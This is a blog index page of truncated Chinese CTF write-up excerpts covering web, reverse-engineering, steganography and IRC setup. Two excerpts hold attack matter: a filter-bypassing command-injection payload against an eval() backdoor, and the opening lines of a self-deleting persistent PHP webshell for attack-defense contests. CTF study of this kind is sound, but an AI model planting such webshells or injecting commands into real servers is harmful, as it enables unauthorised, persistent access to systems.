随笔分类 - CTF
摘要:#背景 一个黑页 eval($_POST['xxx']) 其实扫备份文件是可以扫到的 但是做的时候没扫 直接做了 #尝试 存在部分关键词过滤,其中正常应该使用POST:a=system("ls"); 但此处;被过滤 发现可以使用?>,即a=system("ls") ?> ##尝试获取源码 先看下文件
阅读全文
摘要:#Attack ##漏洞利用 文件上传 任意文件读取 ##webshell上传 不死马确实好用 <?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '3.php'; $code = '<?php if
阅读全文
摘要:#Reverse IDA使用指令 链接 ##内涵 0707 直接拖进IDA看到疑似flag,按A可以转中文 A ASCII解析成ASCII ##[BJDCTF 2nd]guessgame 拖进IDA 发现flag ##xor 拖进IDA int __cdecl main(int argc, cons
阅读全文
摘要:stego Luna 下载文件后得到一张图片及一个压缩包,压缩包需要密码 看一下EXIF信息,得到 解压得到 jut一直尝试各种方式解不开,开始以为是psd文件,binwalk无法分解,看了wp学到一种新的。。姿势 0x2D处包含zlib数据,将此处数据导出为新文件,写一个bash文件尝试解压数据
阅读全文
摘要:N1ctf的签到就是这个 0ctf提前准备一下 首先安装weechat sudo apt-get install weechat /server add freenode chat.freenode.Net #选择添加freenode服务器 /connect freenode /nick USREN
阅读全文